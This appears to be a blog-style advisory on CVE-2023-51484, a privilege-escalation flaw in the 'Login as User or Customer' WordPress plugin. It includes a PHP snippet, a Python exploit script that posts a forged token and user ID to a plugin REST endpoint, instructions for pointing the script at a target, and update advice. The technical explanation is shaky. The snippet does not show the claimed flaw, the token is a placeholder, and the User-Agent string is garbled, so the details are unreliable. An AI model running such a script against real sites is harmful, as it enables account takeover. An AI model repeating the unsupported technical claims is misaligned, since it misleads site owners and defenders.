CVE-2023-51484 - Improper Authentication Vulnerability in "Login as User or Customer" (User Switching) WordPress Plugin Leads to Privilege Escalation

There is a recently discovered vulnerability in the plugin named "Login as User or Customer" (User Switching) which allows an attacker to escalate their privileges by exploiting the improper authentication mechanism. This issue affects the plugin from n/a version through 3.8. In this post, we will be discussing the technical details of the vulnerability, the potential risks it poses, and steps you can take to protect your WordPress website. You can find the original references for this issue in the following links:

- CVE-2023-51484
- Login as User or Customer (User Switching) Official Page

Vulnerability Details

The vulnerability exists due to improper authentication mechanisms implemented in the plugin. When an administrator or another user with appropriate permissions uses the "Login as User or Customer" function, the plugin creates a token and stores it in the database. This token is then used to log in as the specified user. However, the vulnerability allows an attacker to forge a token without proper authentication and escalate their privileges within the WordPress site.

Here is a code snippet that demonstrates the issue

function lauc_login_user( $user_id ) {
  // [...] Generate token and set expiration time
  $token = wp_generate_password( 43, false, false );
  $expiration = time() + 10 * MINUTE_IN_SECONDS;
  // [...] Store token and expiration time in the database
  update_user_meta( $user_id, 'lauc_login_token', $token );
  update_user_meta( $user_id, 'lauc_expiration', $expiration);
  // [...] Set the auth cookie
  wp_set_auth_cookie( $user_id, false, '', $token );
}

In the code above, the wp_generate_password() function is used to create a token, but the lack of proper validation allows an attacker to manipulate this token and escalate their privileges.

Exploit Details

The exploit takes advantage of the plugin's improper authentication mechanism. An attacker could create a malicious token request along with a forged user ID and inject it into the application. This would grant the attacker unauthorized access to the user's account with escalated privileges. The following is a sample exploit code:

import requests

# Change this to your target WordPress site URL
target_url = "https://your-target-wordpress-site.com";

# Change this to the target user's ID
target_user_id = 1

# Forge the malicious token
malicious_token = "forged_token_value_here"

# Craft the request headers
headers = {
  "Content-Type": "application/x-www-form-urlencoded",
  "Accept": "application/json",
  "Connection": "Keep-Alive",
  "User-Agent": "Mozilla/5. (Windows NT 10.; Win64; x64; rv:90.) Gecko/20100101 Firefox/90."
}

# Forge the request body
payload = f"user_id={target_user_id}&token={malicious_token}"

# Send the request to the target site
response = requests.post(target_url + "/wp-json/lauc/v1/login", data=payload, headers=headers)

# Check if successful
if response.status_code == 200 and "success" in response.json():
  print("Exploit Successful!")
else:
  print("Exploit Failed!")

To use this exploit, you need to have Python 3.x installed on your machine and update the target_url and target_user_id variables accordingly.

Solution and Mitigation

As of now, the best way to mitigate this vulnerability is to update the "Login as User or Customer" (User Switching) plugin to the latest version. The plugin author has addressed this issue in version 3.9. You can update the plugin from your WordPress dashboard or download it from the official plugin page.

In addition, make sure to follow the best practices for securing your WordPress site, such as using strong passwords, keeping all plugins and themes up-to-date, and utilizing security plugins like Wordfence or Sucuri.

Conclusion

The CVE-2023-51484 vulnerability poses a significant risk to websites using the "Login as User or Customer" (User Switching) WordPress plugin up to version 3.8. Ensure your site is using the latest version of the plugin and follow best practices for securing your WordPress installation. By doing so, you'll be well on your way to keeping your site and its users safe from potential threats.

Timeline

Published on: 04/25/2024 09:15:07 UTC
Last modified on: 04/25/2024 13:18:13 UTC